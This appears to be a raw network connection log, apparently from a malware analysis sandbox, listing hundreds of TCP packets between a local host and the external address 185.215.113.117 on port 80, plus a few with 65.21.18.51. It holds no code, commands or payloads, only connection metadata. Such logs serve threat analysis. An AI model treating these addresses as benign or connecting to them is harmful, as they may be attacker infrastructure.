Sep 27, 2024 04:21:18.197421074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197421074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197422981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197434902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197448015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197458029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.197468996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197468996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.197501898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198023081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198122025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198158979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198194027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198205948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198206902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198237896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198237896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198249102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198335886 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198373079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198388100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198400021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198411942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198435068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198435068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198457003 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198522091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198534012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198545933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198580980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198580980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198591948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198602915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198615074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198626041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198626995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198651075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198658943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198671103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198681116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198688030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198698044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198698997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198712111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198724031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198730946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198730946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198781967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198920012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198931932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198946953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198957920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.198976040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.198996067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.199002981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.199007034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.199016094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.199028015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.199049950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.199049950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.199079037 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.199103117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.199186087 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.224597931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.224626064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.224637985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.224644899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.224652052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.224666119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.224679947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.224694014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.224699974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.224700928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.224745989 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.224745989 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227365971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227381945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227402925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227421999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227431059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227431059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227437019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227449894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227458000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227458000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227471113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227483034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227488995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227488995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227494955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227508068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227516890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227516890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227523088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227535009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227547884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227554083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227554083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227560043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227577925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227577925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227634907 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227765083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227848053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227858067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227869987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227881908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227894068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227899075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227899075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227906942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227917910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.227955103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.227955103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247189045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247206926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247217894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247231960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247242928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247256041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247267008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247267008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247270107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247332096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247344971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247363091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247370005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247374058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247402906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247402906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247404099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247417927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247428894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247437954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247437954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247443914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247457981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.247467041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247467041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247498035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.247498035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.259949923 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:18.285942078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.285959005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.285970926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.285981894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.285993099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286003113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286015987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286051989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286056995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.286056995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.286065102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286173105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286189079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286201954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286211967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286223888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286235094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.286257029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.286257029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.286257029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.286257029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.286257029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.286292076 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.287755013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287787914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287797928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287834883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287846088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287853956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.287853956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.287858009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287872076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287884951 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.287902117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.287921906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.287921906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.287944078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.287956953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288002968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.288079023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288089991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288100004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288117886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288117886 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.288130045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288142920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288144112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.288144112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.288156986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.288157940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.288186073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.288186073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.288250923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.289740086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289768934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289779902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289803028 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.289843082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289854050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289865017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289877892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289890051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.289890051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.289921999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.289921999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.289952993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289963007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289973021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289983988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.289993048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290005922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290007114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290007114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290021896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290031910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290031910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290036917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290060997 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290060997 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290288925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290673018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290683985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290695906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290724993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290730000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290730000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290735960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290767908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290770054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290770054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290803909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290816069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290826082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290838957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290838957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290863991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290863991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290908098 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290925980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290937901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290949106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.290988922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290988922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.290993929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291048050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291059017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291069031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291096926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291096926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291131020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291142941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291161060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291166067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291166067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291171074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291177034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291182995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291189909 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291204929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291215897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291228056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291232109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291266918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291393042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291404009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291414022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291470051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291481018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291492939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291503906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291518927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291518927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291553020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291553020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.291564941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291575909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.291788101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.301796913 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:18.317111015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.317148924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.317162991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.317167044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.317179918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.317190886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.317203999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.317203999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.317203999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.317214966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.317270041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.317270041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319657087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319688082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319698095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319720030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319721937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319721937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319731951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319744110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319753885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319753885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319756031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319782019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319782019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319813013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319823980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319843054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319854021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319854975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319854975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319864988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319875002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319885969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319917917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.319937944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319948912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319960117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319968939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.319978952 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.320167065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.320373058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.320450068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.320462942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.320494890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.320506096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.320513964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.320513964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.320519924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.320533991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.320559978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.320559978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.320583105 CEST	49725	80	192.168.2.5	185.215.113.117
